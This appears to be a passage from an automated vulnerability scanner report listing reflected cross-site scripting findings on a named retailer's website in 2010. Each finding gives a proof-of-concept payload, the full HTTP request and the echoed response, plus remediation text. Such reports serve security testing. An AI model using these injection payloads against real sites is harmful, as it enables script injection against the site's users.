Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Track J
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1");
//]]>
...[SNIP]...

1.226. http://www.fredperry.com/men/trousers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32758"-alert(1)-"88339fcc816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men32758"-alert(1)-"88339fcc816/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=agnd4mrumvubq89l712rq44e55; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men32758"-alert(1)-"88339fcc816/trousers/");
//]]>
...[SNIP]...

1.227. http://www.fredperry.com/men/trousers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641ae"-alert(1)-"0f8046e452d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/trousers641ae"-alert(1)-"0f8046e452d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tm365jrdhtskqa9asf90no4sp0; expires=Tue, 09-Nov-2010 17:02:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/trousers641ae"-alert(1)-"0f8046e452d/");
//]]>
...[SNIP]...

1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c177f"-alert(1)-"7e003bc6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/trousers/?c177f"-alert(1)-"7e003bc6dd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9igs671tvn9lchq7565js7dvv2; expires=Tue, 09-Nov-2010 17:00:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's T
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/trousers/?c177f"-alert(1)-"7e003bc6dd=1");
//]]>
...[SNIP]...

1.229. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70388"-alert(1)-"5b48da15cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men70388"-alert(1)-"5b48da15cf0/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=be02l2afv72o2hgpi89r2t6k21; expires=Tue, 09-Nov-2010 17:02:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men70388"-alert(1)-"5b48da15cf0/woven-shirts/");
//]]>
...[SNIP]...

1.230. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57173"-alert(1)-"36554d3b526 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/woven-shirts57173"-alert(1)-"36554d3b526/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ielk38p1cdvnm9vrm5hl46edf1; expires=Tue, 09-Nov-2010 17:02:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/woven-shirts57173"-alert(1)-"36554d3b526/");
//]]>
...[SNIP]...

1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8afd8"-alert(1)-"8bd75d8fddd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s1fpmi78oovkincf8akrcqp2i1; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/woven-shirts/?8afd8"-alert(1)-"8bd75d8fddd=1");
//]]>
...[SNIP]...

1.232. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c55"-alert(1)-"c7ef5670682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4dk5d5fdmk3eqt52kduntndmk1; expires=Tue, 09-Nov-2010 17:24:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfoa6c55"-alert(1)-"c7ef5670682/clothingsizes/");
//]]>
...[SNIP]...

1.233. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5c47"-alert(1)-"0dd4d3a7fb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9bdq06ni08c4g2tn7li98can80; expires=Tue, 09-Nov-2010 17:24:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/clothingsizesd5c47"-alert(1)-"0dd4d3a7fb3/");
//]]>
...[SNIP]...

1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/clothingsizes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 935de"-alert(1)-"65c96b3a2a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uv4c754ce5o9idhmmcc9egapj7; expires=Tue, 09-Nov-2010 17:23:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Clothin
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/clothingsizes/?935de"-alert(1)-"65c96b3a2a8=1");
//]]>
...[SNIP]...

1.235. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8766a"-alert(1)-"5e40dafcba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g1a2987226st1p04jpl19bp5o7; expires=Tue, 09-Nov-2010 17:20:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo8766a"-alert(1)-"5e40dafcba/footwearsizes/");
//]]>
...[SNIP]...

1.236. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e65d7"-alert(1)-"854115540de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/footwearsizese65d7"-alert(1)-"854115540de/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lb7d9b5603smg4kjol3qn871u6; expires=Tue, 09-Nov-2010 17:20:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/footwearsizese65d7"-alert(1)-"854115540de/");
//]]>
...[SNIP]...

1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/footwearsizes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb3f0"-alert(1)-"7841aac267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jvt7334pjhmribj6rldhpgtti0; expires=Tue, 09-Nov-2010 17:19:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Footwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/footwearsizes/?cb3f0"-alert(1)-"7841aac267f=1");
//]]>
...[SNIP]...

1.238. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41bd1"-alert(1)-"d86befb387e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sl5ve9h94p1gn2rpouag2sh9s7; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo41bd1"-alert(1)-"d86befb387e/garmentcare/");
//]]>
...[SNIP]...

1.239. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cd0"-alert(1)-"28805937ef9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

